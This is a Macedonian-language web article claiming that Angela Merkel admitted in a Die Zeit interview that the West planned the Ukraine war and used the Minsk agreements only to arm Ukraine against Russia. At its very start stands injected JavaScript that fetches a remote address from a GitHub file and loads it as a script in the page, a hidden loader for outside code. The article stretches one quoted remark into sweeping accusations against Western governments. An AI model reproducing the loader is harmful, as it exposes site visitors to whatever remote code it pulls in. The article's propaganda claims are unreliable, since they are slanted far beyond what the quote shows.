;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Меркел експлицитно призна дека војната во Украина е планирана од Западот - Антропол
АктуелноИнтернационално

Меркел експлицитно призна дека војната во Украина е планирана од Западот

  • Објава на ДСП Ленка

Поранешната канцеларка на Германија, Ангела Меркел, во интервјуто за германскиот весник, Ди Зајт (Време), меѓу другото, експлицитно призна дека Договорот од Минск – кој требаше да биде мирно решение за кризата во Украина и кој се потпиша токму во време кога Меркел беше на чело на Владата на Германија, а гарант за истиот, покрај Франција беше и Германија – бил само тактички за да се добие на време, кое на колективниот Запад ќе му дозволи соодветно да ја спреми и милитаризира Украина како антируски застапник спремајќи ја за војна!

„Договорот од Минск од 2014 година беше само обид да и се даде време на Украина. Како што впрочем може да видете денесм Украина го искористи ова време за да стане посилна.“ вели Меркел во гореспоменатото интервју.

Меркел во ова интервју потврди дека всушност, сите оние политички актери на европа кои денеска ревносно, како на стадион, ја бодрат и билдат со оружје Украина, вклучително и таа (Меркел) самата, не направија ништо за зачувување на мирот во европа. Напротив, од овие зборови на Меркел, се гледа дека тие максимално се потрудиле да ја разгорат војната против Русија на територијата на Украина, а за сето тоа да платат со животите на Украинскиот народ!

Колективниот запад уште еднаш самиот потврдува дека, во целиот процес на градење на безбедносната архитектура на европскиот континент, но и светот во целинс ја мамел и замајувал Русија. Впрочем, како што направи со ветувањата дека нема да го прошири НАТО, како што направи и при потпишување на договорие за ABM (Anti-Ballistic Missile Treaty – Договор за антибалистички ракети) и INF (Intermediate-Range Nuclear Forces Treaty – Договор за ликвидација на ракети со среден дострел) и повече слични ситуации во минатото.

Ова е доказ дека на ниту една изјава, која доаѓа од страна на функционери и претставници на институциите и политичките ентитети на колективниот Запад, не може да им се вреува! После ова, никој не може да се сомнева дека Вашингтон, Лондон и Брисел донесоа војна во Украина а нивната муниција се украинците.

Да се потсетиме, Договорите од Минск, потпишани во 2015 година, имаа за цел решавање на ситуацијата во источна Украина. За таа цел предвидуваа прекин на огнот, повлекување на тешкото вооружување од линијата на контакт, како и уставни реформи, чии клучни елементи требаше да бидат децентрализацијата и усвојување на закон за посебен статус на одредени окрузи од регионите Доњецк и Луганск. Сепак, овој план никогаш не беше спроведен како обврска на режимот во Киев.